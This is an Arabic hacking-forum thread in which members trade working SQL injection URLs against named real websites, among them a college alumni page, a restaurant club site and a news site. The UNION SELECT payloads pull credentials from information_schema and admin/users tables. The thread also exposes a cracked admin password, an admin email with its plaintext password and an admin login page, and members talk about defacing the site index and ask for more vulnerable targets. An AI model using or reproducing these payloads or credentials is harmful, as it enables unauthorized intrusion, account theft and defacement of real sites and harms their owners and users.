العدد (3) من غرفة الحقن

الحقنة الاخيرة http://www.montserrat.edu/alumni/alumni-profile.php?profile_id=-2 UNION SELECT...

الحالة
مغلق و غير مفتوح للمزيد من الردود.
إ

إسلام العالم

New Member
العدد (3) من غرفة الحقن
Victors قال:
وهذا موقع قبل ما اروح انام :)

http://www.montserrat.edu/alumni/alumni-profile.php?profile_id=2

يالله تصبحوا على خير


اشوفكم بكره ان شاء الله
أنقر للتوسيع...

الحقنة :
http://www.montserrat.edu/alumni/alumni-profile.php?profile_id=2 and 1=0 UNION SELECT 1,2,group_concat(column_name,0x3e,table_schema,0x3e,table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+column_name +like+char(37, 112, 97, 115, 115, 37)--
أنقر للتوسيع...

اليوزر :
الباس :f130b8702797007b6a0f68b8c414d00c is
بعد فك التشفير : 1970@mca!

و لكن كالعادة لم أجد لوحة الأدمن....
 
A

agentsimo

New Member
العدد (3) من غرفة الحقن
السلام عليكم
اليوم جايب ليكم هدف لاصحاب البلايند
http://www.monsmartphone.net/smartphone.php?id=71
الحقيقة انا ما عرفت احقنه لانني لا اعرف ما هو table name الدي يوجد فيه اليوز و الباس و column name بتاع اليوز و الباس للموقع المهم اضن هده هي صعوبة البلايند يعني ان لم تكن تعرف السكريبت جيدا ما راح تقدر تحقنو متلا كان سكريبت جوملا كلنا نعرف table و column بتاعو لدلك نحقنو بسهولة لكن ان لم نعرفه راح نلقا صعوبة و اضن هده هي صعوبة البلايند البعض يقول في acssi لكن اضنها سهلة فهي سوى مسالة وقت لتكملها
ارجو النقاش في الموضوع و شكراا
 
D

Dr.Unkn0wn

<b/>.:: لا إله إلا الله محمد رسول الله ::.<b>
العدد (3) من غرفة الحقن
[align=center]الحقنة[/align]
PHP: 
http://beltranssat.by/news_details.php?news_id=-1 UNION SELECT 1,concat(login,0x3a,admin_user_id,0x3a,password),3,4 from admin_user--
 
A

agentsimo

New Member
العدد (3) من غرفة الحقن
ههههههه يبدو ان كل الدي يوجد في الغرفة لا يعرف البلاين
هل تعرفون ان المواقع المهمة لاختراقها فانها تتطلب جهد اكترمن الحقن العادي متل مواقع الحكومية و مواقع الشوب المشهورة ...
لدلك نريد تعلم اكتر على البلايند
 
إ

إسلام العالم

New Member
العدد (3) من غرفة الحقن
agentsimo قال:
ههههههه يبدو ان كل الدي يوجد في الغرفة لا يعرف البلاين
هل تعرفون ان المواقع المهمة لاختراقها فانها تتطلب جهد اكترمن الحقن العادي متل مواقع الحكومية و مواقع الشوب المشهورة ...
لدلك نريد تعلم اكتر على البلايند
أنقر للتوسيع...

أخي أنا شوي منيح بالبلايند ...

و المواقع يلي وضعتها ليست مصابة بالبلايند أخي....
 
A

agentsimo

New Member
العدد (3) من غرفة الحقن
ههههههههههههه
يبدو انك ما بتعرف شيء عن البلايند سكيول
المرة القادمة لا تقل شيء و انت لا تعرف شيء عنه ادهب لمنتدى الدورات و راجع دورت البلايند
و المواقع هي مصابة بالبلايند 100%
 
A

agentsimo

New Member
العدد (3) من غرفة الحقن
تم الحقن و العمودالمصاب هو رقم 3
بالنسبة للاخ الدي لم يجد العمود المصاب اقول له ان العمود المصاب موجود في صورة محجوبة يعني غير شغالة تجي و تعمل لها propriete ستجد في رابطها رقم العمود المصابنحن طلع معنا رقم 3 يعني هو لي مصاب و طبعا النتيجة حتكون في الصورة المعطوبة يعني كل مرة في الحقن ستعمل propriete لصورة لتطلع لك المعلومات المهم هدى الحجب للاعمدة المصابة يعملونه المبرمجون لدوافع امنية يعني ما يتلع العمود المصاب و نحن الحمد لله تخطينا المشكل و ارجو ان اكون وضحت لك كيفي تطلع الاعمدة المصابة
المهم الحقنة
http://www.curryclub.org/ShowRestaurant.php?RestID=2 UNION SELECT 1,2,group_concat(ID,0x3a,Name,0x3a,Password,0x3a,Email,0x3a,SuperUser),4,5+from+users--
صفحة الادمين
http://www.curryclub.org/login.php
معلومات الادمين
mark@extrabit.com
xyzzy
بانتضار رفع الاندكس :yes:
 
V

Victors

New Member
العدد (3) من غرفة الحقن
لعلمكم العمود المصاب ليس 3 فقط ولكن العمود 4 مصاب ايضاُ smilies3
 
إ

إسلام العالم

New Member
العدد (3) من غرفة الحقن
agentsimo قال:
ههههههههههههه
يبدو انك ما بتعرف شيء عن البلايند سكيول
المرة القادمة لا تقل شيء و انت لا تعرف شيء عنه ادهب لمنتدى الدورات و راجع دورت البلايند
و المواقع هي مصابة بالبلايند 100%
أنقر للتوسيع...

أخي معليش أنا ما بعرف شي بالبلايند...
بس لو ممكن تتأكد من أول موقع وضعته...
الثاني مصاب و لكن لم أقدر أن أخمن الجدول....
 
D

Dr.Unkn0wn

<b/>.:: لا إله إلا الله محمد رسول الله ::.<b>
العدد (3) من غرفة الحقن
السلام عليكم
اعطونا مواقع مصابة بسكيول انجكشين
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
أعلى